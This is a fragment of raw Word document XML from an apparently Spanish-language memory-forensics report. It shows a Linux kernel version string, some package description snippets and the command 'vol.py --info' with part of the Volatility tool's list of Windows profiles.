    <w:p w14:paraId="2165271C" w14:textId="77777777" w:rsidR="00182D42" w:rsidRPr="00C9562B" w:rsidRDefault="00182D42" w:rsidP="00182D42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A332304" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B331E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Packages build for Linux versions have support to btrfs filesystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D30414" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="354EE917" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B331E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>MESSAGE=Linux version 4.15.0-1021-aws (buildd@lcy01-amd64-001) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #21-Ubuntu SMP Tue Aug 28 10:23:07 UTC 2018 (Ubuntu 4.15.0-1021.21-aws 4.15.18)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485052E0" w14:textId="1BA18378" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B331E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Also included is a Linux version of the VMS "Phone" utility and a VMSMail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C882C86" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F50F9E3" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B331E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is the GNU/Linux version of the popular PasswordSafe password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F20DFA8" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="508F4DD5" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B331E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> file systems, NFS, top processes, resources (Linux version &amp; processors) and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B30F4BD" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24A9D273" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B331E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> This package provides the Linux version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3029E628" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21FB591A" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B331E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> file systems, NFS, top processes, resources (Linux version &amp; processors) and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526F4ACC" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4295ED52" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B331E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    On some Linux version, write-only pipe are detected as readable. This</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12954BC7" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CBE4972" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B331E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> o  The intent is to make the tool independent of Linux version dependencies,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0488D8B4" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B14480B" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B331E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Linux version 4.15.0-1021-aws (buildd@lcy01-amd64-001) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #21-Ubuntu SMP Tue Aug 28 10:23:07 UTC 2018 (Ubuntu 4.15.0-1021.21-aws 4.15.18)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EE28D7" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541CBF96" w14:textId="77777777" w:rsidR="00B331E9" w:rsidRPr="00B331E9" w:rsidRDefault="00B331E9" w:rsidP="00B331E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B331E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    On some Linux version, write-only pipe are detected as readable. This</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAC3881" w14:textId="77777777" w:rsidR="00182D42" w:rsidRPr="00C9562B" w:rsidRDefault="00182D42" w:rsidP="00182D42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D007CE3" w14:textId="77777777" w:rsidR="00182D42" w:rsidRDefault="00182D42" w:rsidP="00182D42"/>
    <w:p w14:paraId="2A8AF6DF" w14:textId="77777777" w:rsidR="00075CA6" w:rsidRDefault="00075CA6" w:rsidP="00075CA6"/>
    <w:p w14:paraId="5E609E4F" w14:textId="77777777" w:rsidR="00075CA6" w:rsidRDefault="00075CA6" w:rsidP="00075CA6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="255301B0" w14:textId="250B10E2" w:rsidR="00C9562B" w:rsidRDefault="00075CA6" w:rsidP="00D52A79">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="172" w:name="_Ref155717596"/>
      <w:bookmarkStart w:id="173" w:name="_Toc155782529"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">V. </w:t>
      </w:r>
      <w:r w:rsidR="00D52A79" w:rsidRPr="00D52A79">
        <w:t xml:space="preserve">Comando vol.py </w:t>
      </w:r>
      <w:r w:rsidR="00D52A79">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00D52A79" w:rsidRPr="00D52A79">
        <w:t>info</w:t>
      </w:r>
      <w:r w:rsidR="00D52A79">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="168"/>
      <w:bookmarkEnd w:id="172"/>
      <w:bookmarkEnd w:id="173"/>
    </w:p>
    <w:p w14:paraId="5C77BF48" w14:textId="77777777" w:rsidR="00D52A79" w:rsidRDefault="00D52A79" w:rsidP="00D52A79"/>
    <w:p w14:paraId="7D268E2C" w14:textId="77777777" w:rsidR="00D52A79" w:rsidRPr="00C9562B" w:rsidRDefault="00D52A79" w:rsidP="00D52A79">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A301BCE" w14:textId="77777777" w:rsidR="00D52A79" w:rsidRDefault="00D52A79" w:rsidP="00D52A79">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D52A79">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo python2.7 vol.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00D52A79">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D7A26D" w14:textId="5E212FB5" w:rsidR="00D52A79" w:rsidRPr="00C9562B" w:rsidRDefault="00D52A79" w:rsidP="00D52A79">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D16B6BC" w14:textId="77777777" w:rsidR="00D52A79" w:rsidRDefault="00D52A79" w:rsidP="00D52A79">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767EED30" w14:textId="3BDA9F1C" w:rsidR="00D52A79" w:rsidRDefault="00D52A79" w:rsidP="00D52A79">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>La respuesta de la consola es la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AECADB" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00520AAC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E5E301D" w14:textId="7B6D21A9" w:rsidR="00D52A79" w:rsidRDefault="00D52A79" w:rsidP="00D52A79">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C2D20"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Profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CBEECE"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479527EE"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VistaSP0x64                         - A Profile for Windows Vista SP0 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4029C029"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VistaSP0x86                         - A Profile for Windows Vista SP0 x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBDB18C"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VistaSP1x64                         - A Profile for Windows Vista SP1 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34511ABB"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VistaSP1x86                         - A Profile for Windows Vista SP1 x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267B4DBA"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VistaSP2x64                         - A Profile for Windows Vista SP2 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6361B195"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VistaSP2x86                         - A Profile for Windows Vista SP2 x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E6993D"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Win10x64                            - A Profile for Windows 10 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A919984"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Win10x64_10240_17770                - A Profile for Windows 10 x64 (10.0.10240.17770 / 2018-02-10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBB4D6B"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Win10x64_10586                      - A Profile for Windows 10 x64 (10.0.10586.306 / 2016-04-23)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2295F45D"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Win10x64_14393                      - A Profile for Windows 10 x64 (10.0.14393.0 / 2016-07-16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCC5C3D"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Win10x64_15063                      - A Profile for Windows 10 x64 (10.0.15063.0 / 2017-04-04)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FB82CD"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Win10x64_16299                      - A Profile for Windows 10 x64 (10.0.16299.0 / 2017-09-22)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D5C903"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Win10x64_17134                      - A Profile for Windows 10 x64 (10.0.17134.1 / 2018-04-11)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8D706E"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Win10x64_17763                      - A Profile for Windows 10 x64 (10.0.17763.0 / 2018-10-12)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631ED4A5"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Win10x64_18362                      - A Profile for Windows 10 x64 (10.0.18362.0 / 2019-04-23)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D0AFFC"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Win10x64_19041                      - A Profile for Windows 10 x64 (10.0.19041.0 / 2020-04-17)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FC1B8E"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Win10x86                            - A Profile for Windows 10 x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B9FB96"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Win10x86_10240_17770                - A Profile for Windows 10 x86 (10.0.10240.17770 / 2018-02-10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F5A400"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Win10x86_10586                      - A Profile for Windows 10 x86 (10.0.10586.420 / 2016-05-28)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A16D3D"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Win10x86_14393                      - A Profile for Windows 10 x86 (10.0.14393.0 / 2016-07-16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E8A3D1"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Win10x86_15063                      - A Profile for Windows 10 x86 (10.0.15063.0 / 2017-04-04)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE1368E"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Win10x86_16299                      - A Profile for Windows 10 x86 (10.0.16299.15 / 2017-09-29)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF6D72D"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Win10x86_17134                      - A Profile for Windows 10 x86 (10.0.17134.1 / 2018-04-11)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A9C145"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Win10x86_17763                      - A Profile for Windows 10 x86 (10.0.17763.0 / 2018-10-12)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486871CC"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Win10x86_18362                      - A Profile for Windows 10 x86 (10.0.18362.0 / 2019-04-23)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E27101"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Win10x86_19041                      - A Profile for Windows 10 x86 (10.0.19041.0 / 2020-04-17)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1621A9"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Win2003SP0x86                       - A Profile for Windows 2003 SP0 x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F161241"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Win2003SP1x64                       - A Profile for Windows 2003 SP1 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC73ADB"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Win2003SP1x86                       - A Profile for Windows 2003 SP1 x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5229A51F"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Win2003SP2x64                       - A Profile for Windows 2003 SP2 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B06DA1"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Win2003SP2x86                       - A Profile for Windows 2003 SP2 x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656A8B62"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Win2008R2SP0x64                     - A Profile for Windows 2008 R2 SP0 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43721CE5"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lastRenderedPageBreak/>
        <w:t>Win2008R2SP1x64                     - A Profile for Windows 2008 R2 SP1 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCB656C"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Win2008R2SP1x64_23418               - A Profile for Windows 2008 R2 SP1 x64 (6.1.7601.23418 / 2016-04-09)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FE86C0"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Win2008R2SP1x64_24000               - A Profile for Windows 2008 R2 SP1 x64 (6.1.7601.24000 / 2016-04-09)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0384352B"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Win2008SP1x64                       - A Profile for Windows 2008 SP1 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F855B1"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Win2008SP1x86                       - A Profile for Windows 2008 SP1 x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFC1B14"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Win2008SP2x64                       - A Profile for Windows 2008 SP2 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A79574"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Win2008SP2x86                       - A Profile for Windows 2008 SP2 x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701D3CAF"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Win2012R2x64                        - A Profile for Windows Server 2012 R2 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CADF299"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Win2012R2x64_18340                  - A Profile for Windows Server 2012 R2 x64 (6.3.9600.18340 / 2016-05-13)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28409626"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Win2012x64                          - A Profile for Windows Server 2012 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CCFCFB"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Win2016x64_14393                    - A Profile for Windows Server 2016 x64 (10.0.14393.0 / 2016-07-16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63120678"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Win7SP0x64                          - A Profile for Windows 7 SP0 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458F08E7"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Win7SP0x86                          - A Profile for Windows 7 SP0 x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B55618F"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Win7SP1x64                          - A Profile for Windows 7 SP1 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358C640C"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Win7SP1x64_23418                    - A Profile for Windows 7 SP1 x64 (6.1.7601.23418 / 2016-04-09)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E6E391"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Win7SP1x64_24000                    - A Profile for Windows 7 SP1 x64 (6.1.7601.24000 / 2018-01-09)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B52F41"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Win7SP1x86                          - A Profile for Windows 7 SP1 x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E2BAEF"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Win7SP1x86_23418                    - A Profile for Windows 7 SP1 x86 (6.1.7601.23418 / 2016-04-09)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2A595B"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Win7SP1x86_24000                    - A Profile for Windows 7 SP1 x86 (6.1.7601.24000 / 2018-01-09)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B3060D"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Win81U1x64                          - A Profile for Windows 8.1 Update 1 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFBDC4A"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Win81U1x86                          - A Profile for Windows 8.1 Update 1 x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153EEC3C"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Win8SP0x64                          - A Profile for Windows 8 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F97C43"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Win8SP0x86                          - A Profile for Windows 8 x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6320CE3C"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Win8SP1x64                          - A Profile for Windows 8.1 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C94C0F7"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Win8SP1x64_18340                    - A Profile for Windows 8.1 x64 (6.3.9600.18340 / 2016-05-13)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BBB685"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Win8SP1x86                          - A Profile for Windows 8.1 x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4955F0A5"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WinXPSP1x64                         - A Profile for Windows XP SP1 x64</w:t>
      </w:r>
    </w:p>
